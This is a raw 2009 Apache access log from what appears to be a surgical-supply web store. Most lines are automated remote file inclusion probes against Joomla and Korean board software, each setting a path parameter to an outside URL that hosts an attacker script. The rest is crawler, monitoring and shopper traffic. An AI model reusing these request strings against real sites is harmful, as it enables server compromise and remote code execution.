59.125.5.1 - - [28/Jun/2009:05:16:42 -0400] "GET /logs/access_log.Q109060200//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.151.217.29 - - [28/Jun/2009:05:16:56 -0400] "GET /logs/access_log.Q109061800%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
203.151.217.29 - - [28/Jun/2009:05:16:56 -0400] "GET /logs/access_log.Q109061500%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:17:14 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:17:14 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:17:14 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:17:15 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.142.148.142 - - [28/Jun/2009:05:18:16 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.142.148.142 - - [28/Jun/2009:05:18:16 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
200.142.148.142 - - [28/Jun/2009:05:18:39 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
59.125.5.1 - - [28/Jun/2009:05:19:36 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
59.125.5.1 - - [28/Jun/2009:05:19:36 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
59.125.5.1 - - [28/Jun/2009:05:19:40 -0400] "GET /logs/error_log.Q109060700//bemarket/postscript/postscript.php?p_mode=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
200.142.148.142 - - [28/Jun/2009:05:19:56 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
200.142.148.142 - - [28/Jun/2009:05:20:02 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:05:21:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.243.139.4 - - [28/Jun/2009:05:21:28 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:05:21:28 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:05:21:28 -0400] "GET /logs/access_log.Q109052700//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:05:21:33 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:05:21:33 -0400] "GET /logs/access_log.Q109052700%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:05:21:34 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:05:21:35 -0400] "GET /logs/access_log.Q108030200 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.243.139.4 - - [28/Jun/2009:05:21:40 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:05:22:04 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:05:22:08 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:05:22:08 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:05:22:08 -0400] "GET /logs/access_log.Q109052700//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:05:22:16 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:05:22:58 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:05:22:58 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:05:22:58 -0400] "GET /logs/access_log.Q109052700//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:05:23:09 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:05:23:31 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:05:23:32 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:05:23:32 -0400] "GET /logs/access_log.Q109052700//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:05:24:02 -0400] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:05:24:02 -0400] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:05:24:02 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
203.151.217.29 - - [28/Jun/2009:05:24:15 -0400] "GET /logs/access_log.Q109062200//administrator/components/com_moofaq/css/file_includer.php?file=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:05:24:29 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.142.179 - - [28/Jun/2009:05:24:51 -0400] "GET /images/items/EcOm/ HTTP/1.0" 200 2245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.147.29.190 - - [28/Jun/2009:05:25:00 -0400] "GET /logs/access_log.Q109060500/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:05:26:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.204 - - [28/Jun/2009:05:26:27 -0400] "GET /images/items/04948702_THUMB.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
209.151.224.247 - - [28/Jun/2009:05:27:25 -0400] "GET /logs/access_log.Q109053100/http://www.acbi.co.id/upload/image/pro/shv5/idx? HTTP/1.1" 404 272 "-" "libwww-perl/5.823"
209.151.224.247 - - [28/Jun/2009:05:27:25 -0400] "GET /http://www.acbi.co.id/upload/image/pro/shv5/idx? HTTP/1.1" 404 245 "-" "libwww-perl/5.823"
209.151.224.247 - - [28/Jun/2009:05:27:25 -0400] "GET /logs/http://www.acbi.co.id/upload/image/pro/shv5/idx? HTTP/1.1" 404 250 "-" "libwww-perl/5.823"
209.59.12.99 - - [28/Jun/2009:05:31:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.227.193.198 - - [28/Jun/2009:05:31:27 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.227.193.198 - - [28/Jun/2009:05:31:32 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:05:33:34 -0400] "GET /logs/access_log.Q108060800 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.153.28.140 - - [28/Jun/2009:05:36:10 -0400] "GET /kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
125.131.116.12 - - [28/Jun/2009:05:36:10 -0400] "GET /logs/access_log.Q109051100%20%20//include/write.php?dir=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
125.131.116.12 - - [28/Jun/2009:05:36:10 -0400] "GET //include/write.php?dir=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
125.131.116.12 - - [28/Jun/2009:05:36:12 -0400] "GET /logs//include/write.php?dir=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:36:13 -0400] "GET /kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:36:13 -0400] "GET /logs/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:36:13 -0400] "GET /logs/access_log.Q109051600%20%20/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:36:13 -0400] "GET /logs/access_log.Q109060900/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:36:14 -0400] "GET /logs/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:36:14 -0400] "GET /logs/access_log.Q109051600%20%20/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:36:19 -0400] "GET /logs/access_log.Q109060900%20%20/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:36:23 -0400] "GET /logs/access_log.Q109060900%20%20/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:05:36:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.153.28.140 - - [28/Jun/2009:05:37:14 -0400] "GET /kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:37:14 -0400] "GET /logs/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:37:14 -0400] "GET /logs/access_log.Q109051600/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:37:20 -0400] "GET /logs/access_log.Q109060900/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
58.227.193.198 - - [28/Jun/2009:05:37:38 -0400] "GET /logs/access_log.Q109052500/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:05:37:43 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:05:37:43 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:05:37:43 -0400] "GET /logs/access_log.Q109060100//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:05:38:00 -0400] "GET /logs/access_log.Q109061900//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
203.229.186.240 - - [28/Jun/2009:05:39:05 -0400] "GET /logs/access_log.Q109051500/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://201.16.248.189/manual/howto/bot_site.gif? HTTP/1.1" 404 259 "-" "libwww-perl/5.65"
203.229.186.240 - - [28/Jun/2009:05:39:05 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://201.16.248.189/manual/howto/bot_site.gif? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
203.229.186.240 - - [28/Jun/2009:05:39:06 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://201.16.248.189/manual/howto/bot_site.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
125.131.116.12 - - [28/Jun/2009:05:39:17 -0400] "GET /logs/access_log.Q109051600%20%20//include/write.php?dir=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:05:40:03 -0400] "GET /logs/access_log.Q109060100%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:05:40:11 -0400] "GET /logs/access_log.Q109061900%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
66.249.71.16 - - [28/Jun/2009:05:40:33 -0400] "GET /images/items/index4_hose.jpg HTTP/1.1" 200 3567 "-" "Googlebot-Image/1.0"
122.153.28.140 - - [28/Jun/2009:05:40:37 -0400] "GET /kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:40:37 -0400] "GET /logs/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:40:37 -0400] "GET /logs/access_log.Q109051600/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:40:37 -0400] "GET /kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:40:37 -0400] "GET /logs/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:40:37 -0400] "GET /logs/access_log.Q109051600/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:40:41 -0400] "GET /logs/access_log.Q109060900/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:40:42 -0400] "GET /logs/access_log.Q109060900/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
203.229.186.240 - - [28/Jun/2009:05:41:09 -0400] "GET /logs/access_log.Q109061600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://201.16.248.189/manual/howto/bot_site.gif? HTTP/1.1" 404 259 "-" "libwww-perl/5.65"
209.59.12.99 - - [28/Jun/2009:05:41:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.110.97.12 - - [28/Jun/2009:05:42:20 -0400] "GET /logs/access_log.Q109052800//rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
210.110.97.12 - - [28/Jun/2009:05:42:23 -0400] "GET /logs//rgboard/include/mail.inc.php?skin_board_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:05:45:37 -0400] "GET /logs/error_log.Q108080700 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jun/2009:05:46:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.75.60.116 - - [28/Jun/2009:05:48:18 -0400] "GET /?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:05:48:18 -0400] "GET /logs/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 7314 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:05:48:18 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
114.46.202.33 - - [28/Jun/2009:05:48:20 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:48:20 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
216.75.60.116 - - [28/Jun/2009:05:48:21 -0400] "GET /?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:05:48:21 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:05:48:21 -0400] "GET /logs/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 7314 "-" "Mozilla/5.0"
114.46.202.33 - - [28/Jun/2009:05:49:01 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02 HTTP/1.1" 200 53467 "http://www.acesurgical.com/conform.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:02 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:02 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:02 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
